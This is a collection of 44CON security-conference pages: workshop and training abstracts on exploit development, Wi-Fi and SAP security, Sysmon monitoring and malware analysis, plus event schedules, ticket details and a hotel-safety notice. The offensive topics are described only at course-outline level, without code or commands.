          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aim of the workshop is for students to fuzz and develop exploits against (simple) vulnerable network services. Students will be provided with a Scratch environment (VM or bootable USB stick) plus a vulnerable VM to attack. Together we will fuzz and exploit two echo servers (stack smash and format string vulnerability) through interactive investigation in gdb and interactive development in Scratch. Students will then be encouraged to fuzz and develop an exploit against the vulnerable web server provided by tinysploit.

          Upon completion of the Scratch exploits, we will quickly cover how to achieve similar results directly with python.

          If you are new to penetration testing or have been around a while but have never developed your own exploit (maybe you don’t code so well in python or C, or maybe you aren’t comfortable with debugging in gdb) then this workshop will give you the skills to build exploits in Scratch and python and see how to apply this knowledge to more complicated environments.

          Sys Mon! Why yu nuh logging dat?

          Presented by: Charl van der Walt, Willem Mouton, Carl Morris and Wicus Ross

          Sysmon from Microsoft is a very powerful host-level tracing tool, which can assist in detecting advanced threats on your network. It’s free with Windows and a native extension of the Windows stack. Sysmon performs system activity deep monitoring and logs high-confidence indicators of attacks and compromise, but in contrast to common Antivirus / HIDS solutions … it’s stable, mature, simple and FREE!

          Sysmon can monitor lots of interesting activities, including:

          • Process creation (with full command line and hashes)
          • Process termination
          • Network connections
          • File creation timestamps changes
          • Driver/image loading
          • Remote thread creation
          • Raw disk access
          • Process memory access

          and more.

          Another cool technology – Windows Event Forwarding (WEF) – can then be used to read the event log on a device and forward selected events to a Windows Event Collector (WEC) server.

          Put these two together, dump it into the SIEM, database or Elastic Stack of your choice, and you have yourself a pretty fine Windows Event monitoring and Threat Hunting platform.

          In this presentation we will introduce these powerful tools and show you how to implement WEF and deploy Sysmon using your existing AD infrastructure and Group Policy so there is minimal impact on resources, and how to remotely tune and improve the configuration as necessary.

          Win!

          So what then?

          We will then move on to explore how to extract ‘actionable’ intelligence from these logs – what to look for, how to spot it and what to do when you do find the mythical needle in the haystack, using real, practical examples from our own day-to-day operations.

          Finally, we will share in detail some of our experiments (failed and successful) with extracting even more value from these logs, for example:

          • Using Windows Event Logs via Sysmon to detect attacks on Web Applications
          • Performing Event Correlation by pulling Sysmon into MISP
          • Using Python and scikit-learn to implement a semi-supervised learning algorithm using a Markov chain random walk classifier to highlight anomalous events from large volumes of benign ones.

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Source code: https://github.com/nbs-system/snuffleupagus

          Website: https://snuffleupagus.readthedocs.io/

          Twitter: https://twitter.com/sp_php

          Also check our list of Talks for 44CON 2018.


          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…


          44CON 2016

          44CON 2016 will take place on 14th to 16th of September 2016 at the ILEC Conference Centre.

          Early Bird Tickets for 44CON 2016 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          You can book a hotel room at the IBIS for:

          • £110 (inc VAT) per night for a single room
          • £120 (inc VAT) per night for a double or twin room

          Book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON2016D. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          Rory McCune: Mastering Container Security | Sense/Net

          This 2 day course will take place on the 10th & 11th September 2019 at the Novotel London West in Hammersmith.

          For more information about this course, please check our website.

          A ticket for the training does not give you access to the conference; you will need to purchase a combined training course/44CON 2019 Conference ticket here if you wish to attend the conference as well. A ticket for the training does not include accommodation, nor does it include a t-shirt.

          Please register for your course early! Courses require a minimum number of attendees to be conducted. We reserve the right to cancel a course if minimum numbers are not reached up to 3 weeks prior to the event. 

          Conference and training tickets are non-refundable as per our Terms of Service.



          Type: Training
          Vendor: Sense/Net
          Tags: 44CON, 44CON 2019, Sense/Net, ticket, Training
          Price: £1,300.00 GBP

          44CONnect March Week – What to expect

          We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

          Monday 11th March – Training

          Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

          Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

          Tuesday 12th March – Training

          Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

          Wednesday 13th March – 44CONnect

          If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

          Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

          10:00 – Rory McCune – Container Security
          11:00 – Owen Shearing & Will Hunt – Exploiting in.security
          12:00 – Lightning talk round for attendees
          12:30 – Lunch (included for training attendees only)
          14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
          15:00 – Dave Ryan – Reporting is dead. Long live reporting.

          From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

          Thursday 14th March – CRESTCon

          We’re really excited about CRESTCon. 5 lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

          As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

          CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.


          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

          First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

          Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

          Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

          Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

          Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

          We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!


          SAP Cyber-Security for IT Security Practitioners

          Presented By: Jordan Santarsieri

          SAP is a core part of the business-critical infrastructure of 95% of the biggest companies in the world. These companies rely on SAP to perform their most sensitive daily operations, such as processing employee payroll and benefits, managing logistics, managing suppliers and customers, material management, releasing payments to providers, credit card processing, business intelligence, etc.

          This training provides the latest information on SAP specific attacks and remediation / protection activities.

          This training starts with an introduction to SAP (no previous SAP knowledge is required). Through several hands-on exercises and demos, you will learn how to perform your own vulnerability assessments, audits and penetration tests on your SAP platform. You will be very well equipped to understand the critical risks your SAP platform may be facing and how to assess them and, more importantly, you will know the best practices to effectively mitigate them, proactively protecting your business-critical platform.

          We take pride in creating the most comprehensive SAP security agenda!

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Learn the fundamentals of the SAP Architecture
          • Learn the main default misconfigurations that will allow anyone to completely compromise a vanilla SAP Installation
          • Learn more about the obscure SAP proprietary protocols
          • Learn about the SAP Components and how they collaborate with each other
          • Learn how to attack an SAP system without causing business disruption
          • Learn how to defend an SAP, preventing the most common attacks and hacking techniques

          Course Outline

          Day 1:

          • Introduction to SAP
          • What SAP security used to be in the past
          • What SAP security is nowadays
          • Introduction to SAP security tools (the open-source way)
          • Securing the SAP Infrastructure
          • SAP Router
          • SAP Web-dispatcher
          • The role of a firewall
          • How to attack and secure: SAP & Windows
          • How to attack and secure: SAP & Unix
          • How to attack and secure: SAP & Oracle
          • How to attack and secure: SAP & HANA
          • Evolution of HANA
          • HANA Internals
          • What is S/4HANA?
          • Authentication mechanisms
          • User Security
          • Password Policy
          • Authorizations
          • SAP Gateway & RFC
          • SAP Message Server
          • SAP Management Console

          Day 2:

          • SAP Solution Manager
          • SAP System Landscape Directory
          • ABAP Security
          • SAP Back-doors
          • SAP Updates
          • Encryption
          • SAP ICM (Continued)
          • SAP J2EE
          • Understanding the J2EE Framework
          • Different SAP Web J2EE Applications
          • J2EE Authentication Mechanisms
          • SAP JCO
          • SAP Security Audit Trail
          • How to react in case of an SAP Intrusion
          • SAP Lab – Packet wars! (Game subject to time constraints!!)

          Target Audience

          Security employees, from both blue teams who wish to learn how to protect these so-far obscure ERP systems and red teams who wish to learn how to attack these highly critical assets.

          Security consultants who are looking to expand their IT security portfolio, and SAP administrators / auditors who wish to learn more about the technical aspects of SAP security.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics and eagerness to learn new things!

          What to Bring

          • Working laptop where you have enough rights to install new software, connect to a wireless network and change your own IP address

          Software Requirements

          • Everything you need will be provided by your instructor

          Students will be provided with

          • A fully working virtualized platform containing everything you will need for the training!

          About the Trainer

          Lead Instructor – Jordan Santarsieri (@jsantarsieri)

          Mr Santarsieri is a founding partner at Vicxer, where he utilizes his 12+ years of experience in the security industry to bring top-notch research into the ERP (SAP / Oracle) world.

          He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting ERP systems and business-critical applications, helping Vicxer’s customers (Global Fortune-500 companies and defense contractors) to stay one step ahead of cyber-threats.

          Jordan has also discovered critical vulnerabilities in Oracle and SAP software and is a frequent speaker at international security conferences such as Black-Hat, Insomnihack, YSTS, Auscert, Sec-T, Rootcon, NanoSec, Hacker Halted, OWASP US, 8dot8, DragonJAR and Ekoparty.

          Book your 44CON 2018 training course now!

          #####EOF##### help – 44CON

          On Hotel Accommodation And Safety

          First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

          +44 (0)7955 376 729

          Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

          While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on Twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

          To that end, we’ve done two things:

          1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
          2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

          In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

          We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

          If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

          The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

          The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this Twitter thread:

          “I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

          Once again, that emergency crew number is:

          +44 (0)7955 376 729

          If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

          Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

          1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
          2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
          3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
          4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
          5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

          We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

           

          #####EOF##### workshops – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complimentary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

          The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

          Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

          Looking for something more blue team than red? From 20:00, Philippe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack, is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

          While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

          • Best billed idea
          • Most lame duck pitch
          • Most quackers concept

          Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

          If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

          Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature, either in part or in whole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

          #####EOF##### 44CON 2012 Workshops – 44CON

          44CON 2012 Workshops

          Have you ever been to a killer talk or heard a fantastic webcast and thought “If I could only get my hands on and try this stuff I’d be all over it?” Well, when planning out 44CON this year we decided to offer a unique chance to get some practical training sessions to you that will allow you to learn skills you’d pay a training company a small fortune for. Unlike the talks, the workshops will not be on the DVD, so your only chance to acquire this knowledge is in person, kitted out with laptop, tools, and a caffeine-fuelled intensity appropriate to a monk who just escaped from the monastery and found the high street coffee house for the first time.

          We have some of the best in the industry sharing killer skills and techniques that will push you to the edge of your game and beyond. So, let’s step into the lab, and see what’s on the slab…

           

          Creating Fake USB Devices

          Presented by: Phil Polstra

          USB sticks get handed out at conferences, coffee shops, concerts, train stations and even family parties these days. But how do you know what is on that device given to you by that friendly market researcher? USB devices can be used not only to inject attacks through mass storage but also by emulating and exploiting peripherals such as mice, keyboards and scanners. Phil will explain how these devices can be created and used by the penetration tester and what to look for in an incident response.

          This workshop will get participants started on the path to creating their own USB devices.  The basics of how USB devices work and what has to be done to emulate them will be covered.  The FTDI Vinculum II chipset will be used for this workshop.  Participants will leave knowing how to build a fake mass storage device such as the USB write blocker Phil presented at Black Hat Europe 2012 or something similar and also knowing how to make a keyboard logger or similar HID device.

          Workshop Requirements

          Attendees should have their own laptop either running Windows or with Windows installed in a virtual box.

          Ideally each attendee would have a V2DIP1-32 development board and a FTDI debug board to use for this workshop.  The cost for these two items is about GBP20.


          Burp Plugin Development for Java n00bs

          Presented by: Mark Wickenden

          Burp Suite stands out as the de-facto attack proxy for web application assessments. Part of its power lies in the Burp Extender interface, which allows “developers” to extend Burp’s functionality, including reading and modifying runtime data and configuration, triggering key actions such as Burp Scanner, or extending the Burp user interface itself with custom menus and windows.

          That’s great, but I’m not a developer, I’m a webapp tester and I want the goodness too

          This practical workshop will take you from zero to hero even if you’ve never coded a line of Java in your life. Through some basic hands-on examples I will guide you through the process of getting your machine ready for coding, the key features of Burp Extender and how to use it to solve some real world web application testing scenarios.

          Topics covered:

          • The problem Burp Extender solves
          • Getting ready
          • Introduction to the Eclipse IDE
          • Burp Extender Hello World!
          • Manipulating runtime data
          • Decoding a custom encoding scheme
          • “Shelling out” to other scripts
          • Limitations of Burp Extender
          • Examples of really cool Burp plugins to fire your imagination

          The workshop will involve the installation of the Eclipse IDE onto attendee laptops. My intention is to distribute via a file share over wifi to save time downloading over the Internet. Alternatively I may provide the software and sample code on USB sticks if people are ok about putting them into their machines!

          All workshop notes and code will be made available to attendees on the day and on the Internet for wider consumption after the conference.

          Why

          Don’t be just another average tester. Optimise your webapp testing and don’t freak out when your client is using the latest funky compression algorithm which Burp doesn’t understand. Attend this workshop and get with the “program”.

          Workshop Requirements

          Attendees will require:

          • Laptop running Windows 7 (or OSX/Linux but I won’t be demonstrating with/troubleshooting these) with WiFi capability. VM is fine, if not preferred as software installation from an untrusted source (ie, me) is required.
          • Java Runtime Environment 6 or above
          • Burp Suite 1.4 and above (Professional preferred but Free will be ok)
          • Administrator rights to the machine as they will need to install software

          Some programming experience is assumed. My background is in Bash, Perl, PHP, Python and Ruby if that helps to gauge your own capabilities.


          Advanced Wi-Fi Security Penetration Testing

          Presented by: Vivek Ramachandran

          We see your SSIDs. We have enough traffic to extract your key hashes. We can inject and fake our way in using discovered credentials. But once you have this, how do you take it to the next level? In this workshop, Vivek will show how Wi-Fi is not just a way into the wired heart of the corporation, but can be used to control key corporate information security assets and pwn the entire network.

          This workshop will provide a highly technical and in-depth treatment of Wi-Fi security. The emphasis will be to provide the participants with a deep understanding of the principles behind various attacks and not just a quick how-to guide on publicly available tools. We will start our journey with the very basics by dissecting WLAN packet headers with Wireshark, then graduate to the next level by cracking WEP, WPA/WPA2 and then move on to real life challenges like orchestrating Man-in-the-Middle attacks and creating Wi-Fi backdoors for Fun and Profit!

          Details

          • WLAN Protocol Basics using Wireshark
          • Bypassing WLAN Authentication – Shared Key, MAC Filtering, Hidden SSIDs
          • Cracking WLAN Encryption – WEP, WPA/WPA2 Personal and Enterprise, Understanding encryption based flaws (WEP,TKIP,CCMP)
          • Attacking the WLAN Infrastructure – Rogues Devices, Evil Twins, DoS Attacks, MITM
          • Advanced Enterprise Attacks – 802.1x, EAP, LEAP, PEAP, IPSec over WLAN
          • Attacking the Wireless Client – Honeypots and Hotspot attacks, Caffe-Latte, Hirte, Ad-Hoc Networks and Viral SSIDs, WiFishing
          • Breaking into the Client – Metasploit, SET, Social Engineering
          • Enterprise Wi-Fi Worms, Backdoors and Botnets
          • Wireshark as a Wireless Forensics Tool
          • Programming and Scripting Wireless packet sniffers and Injectors for fun and profit

          Why

          1. Trainer is author of the book – “Backtrack 5 Wireless Penetration Testing” which is now used as a guide to teach Wi-Fi pentesting and has discovered multiple attacks on Wi-Fi such as Caffe Latte attack, WEP cloaking cracking and Wi-Fi backdoors on Windows 7.
          2. Workshop is an advanced look into Wi-Fi pentesting in the enterprise on mechanisms such as PEAP, EAP-TTLS etc. which very few people know and understand well
          3. Every attack in the workshop will be shown as a live practical demo or a video – so participants will get a feel for how it is actually done, rather than death by PPT

          Workshop Requirements

          • Internet connection

          If you want to try some examples with Vivek using pcap files which will be provided, then you will need to have a BT5 R1/R2 installation – though this is not mandatory to follow the class


          OpenCL on .Net

          Presented by: Bob Weiss

          Ben utilized OpenCL for .Net for our software for the Enigma. This has broader applications for other crypto and computationally intensive applications. In this workshop we explore how the OpenCL library can be used to penetrate cryptographic protection systems and expose secrets that were thought impregnable!


          Malware Analysis 101: Malware Analysis with Cuckoo Sandbox

          Presented by: Michael Boman

          To analyze malware at speed you need the right tools: an automated system that does all the hard work for you, the skills to interpret its results, and the knowledge to enhance the tool to perform tasks it doesn’t yet know how to perform. This workshop will teach you how to install and configure Cuckoo Sandbox, how to analyze samples and interpret the results, and how to enhance Cuckoo Sandbox.

          Workshop Content:

          1. Installation and configuration of Cuckoo Sandbox
          2. Analysis of samples
          3. Review of sample reports
          4. Extending and enhancing Cuckoo Sandbox

          Malware Analysis 102: Manual Reversing of Malware

          Presented by: Siavosh Zarrasvand

          This workshop will teach you how to reverse basic malware, understand the malware at assembly level and learn how to debug it. You will also learn how packers work and some anti-debugging techniques.

          Workshop Content:

          1. Introduction to Assembly for reversers (means you won’t be able to write assembly, only read and understand it)
             • Instructions, registers, flags, memory segments, etc
          2. Introduction to debugging
             • Will go a bit deep into breakpoints, soft, hard, memory
             • Short stop at patching
          3. Group exercise
          4. Packers, how they work
          5. Basic anti debugging techniques
          6. Group exercise on how to bypass basic anti debugging techniques. (Can be executed individually, depending on the will of the audience)

          Using relationship data to unseat undetected persistent malware

          Presented by: Michael Viscuso

          Most defenders claim that the digital defenders are at a serious disadvantage to attackers. The defender must be perfect. If he makes a single mistake, or leaves one door open, he will lose. The attacker on the other hand just has to be correct once, and can try, and try, and try again until he is. What’s worse, says the defender, is that when the attacker is successful, it’s incredibly difficult for the defender to find him. More often than not he has to make a mistake or fall behind the curve in order for the defender to find his presence.

          Today we are going to turn the tables. After learning the techniques presented in this workshop, you will finally be able to leverage new research findings against historical data to identify morphing malware and advanced persistent threats.


          NIPS and Tatties

          Presented by: Arron Finnon

          The ‘Network Intrusion Detection/Prevention Systems’ (NIDS/NIPS) market can be a complicated place, even for a seasoned security professional. People in reality could think themselves more than justified in saying “they’re useless”, especially in the wake of countless network compromises. It’s hard to avoid a situation, past or present, where total network compromise has come to light even though NIDS/NIPS had been in place. Their purpose by name alone is clear: they’re there to prevent and/or detect intrusions.

          Depending on how you look at it, I have been fortunate or unfortunate enough to be involved with NIDS/NIPS for some time – although my involvement hasn’t been within the world of vendors and products, but detection and mitigation. NIDS/NIPS devices have, and rightly so, faced a lot of criticism over the years. NIDS/NIPS have been “dead for a number of years” some have said, which has always amazed me, especially as they’ve been deployed in large numbers since those obituaries were written. In some cases they’re deployed to satisfy compliance, and in other cases they’re there to actually defend. Still the facts are as follows:

          – They do have a place and a purpose

          – They don’t always do what they claim

          – The security community will continue to moan about them not being a “silver-bullet” solution.

          This workshop looks at the current situation that surrounds the murky world of vendor spin and Intrusion Detection/Prevention Systems. Discussing the potential avenues that as a security community we can take, to gain some control over a lost situation. The ability to deploy simple and effective tests to gauge your own reactions to attempts to subvert your detection system is beneficial in its own right. Adopting an approach where detection rates outweigh network performance figures may also give a better understanding of signs of attack.

          However either way, having your own facts and figures to discuss issues with vendors is priceless.

          If NIDS/NIPS are a “no silver bullet solution” then a more hands on approach is required. By no means is this workshop going to secure your network overnight, and there are no guarantees that some blackhat will fail or succeed. The aim of this workshop is to plant a seed, allowing people to walk away finding that more questions need to be asked of their detection systems, and so we must find a better way of asking them. Hopefully, attendees will leave with at least one major question niggling at their sub-consciousness: “What questions would an IPS hacker ask a vendor?”


          Get More From Your Pentest The Tiger Scheme Way

          Presented by: Steve Lord

          This is an interactive 90 minute workshop for end users of penetration testing from the day to day security ops guy up to the CSO on how to get more from your security test. Lots of people get security tests done and have a fairly ingrained workflow at their end. Often this means copying and pasting from a PDF into a document into a spreadsheet and a whole load of other mundane tasks while the report sits on the shelf. As a customer, you deserve better from us pentesters.

          Over the course of the workshop we’ll start with the penetration test cycle, including developing actionable intelligence and integration with your forensic readiness capabilities, I’ll take you through a typical Internet-facing penetration test from start to finish from the provider view, walking through actual pentest output, our small and big methodology documents and a real report. This will be followed by an open discussion on things that we as pentesters can do to make things better.

          If you’re a penetration tester please do feel free to come along, but bear in mind that if it’s fairly busy in the workshop I might ask you to leave so that more end users of penetration testing can come in.

          Details

          The workshop is interactive. It’s part classroom format but do ask questions and the second half is fully interactive, so if you don’t ask questions I might accidentally Nerf you. As expected, I will be strict on time as I’m sure people will try to Nerf me if I run over, and rightly so! The topics covered in the workshop include:

          • Penetration testing and other related processes
          • Integrating processes with your penetration testing
          • Actionable intelligence
          • Setting goals
          • Scope and rules of engagement
          • Schemes, badges and certifications
          • Methodologies
          • A typical penetration test
          • Threat ratings, traffic lights and voodoo
          • The wash-up
          • Handling findings (snog, marry, avoid)
          • Information sharing and intelligence management
          • The known knowns we can help with
          • The known unknowns we might be able to help with
          • The unknown unknowns (or over to you)

          Shamelessly stealing from Stephen Bonner I will be handing out sweets/choccies to people that ask questions or have confessions to make. As such, this workshop will most definitely not be filmed, and will operate under the Chatham House rule.

          Why?

          I’ve been a penetration tester for over a decade as well as a customer in the past. I also invigilate QSTM exams and occasionally review reports by other testers. I interact with security teams across various sectors around the world with budgets ranging from a chalk outline of a shoestring to millions of pounds on a daily basis. As such I get a lot of sight of the things people do, the things that work and the things that fail and even worse, the things that fail so hard the organisation has to migrate to the ostrich paradigm and work around the problem rather than admit fault and fix it. If you’re someone that uses penetration test reports and you find you have a keyboard or desk-edge shaped wedge in your forehead from dealing with either processes or fallout, this is probably a good workshop to attend.

          Attendees will need to bring

          The ability to interact (i.e. no major restrictions on sharing anonymised anecdotes about their experiences with attendees)


          SecBiz Workshop – Bridging the Security/Business Gap

          Presented by: Rafal Los

          Too many security professionals struggle for relevance in their organizations. The primary reason for much of this struggle is the significant disconnect between the goals of protecting the business, and actually conducting business. After countless conversations with security professionals in organizations large and small, it has become apparent that the security community needs a course on aligning security and business values, and understanding exactly what you’re protecting before you can answer how. If you’re frustrated, and feel disconnected from the business you serve as a security professional you need to be in this workshop. In a collaborative environment we will work through your organization’s goals, your actual security objectives and give you the tools and perspective to be a better agent of change, and to allow you to understand what it is you’re protecting before you start to formulate a strategy of how. In the spirit of Security BSides, there will be no spectators so if you sign up, please be ready to participate, and have as much of the pre-work ready as possible.

          Requirements before the workshop:

          Attain (through interview, or other information gathering) the following information:

          • Corporate mission statement
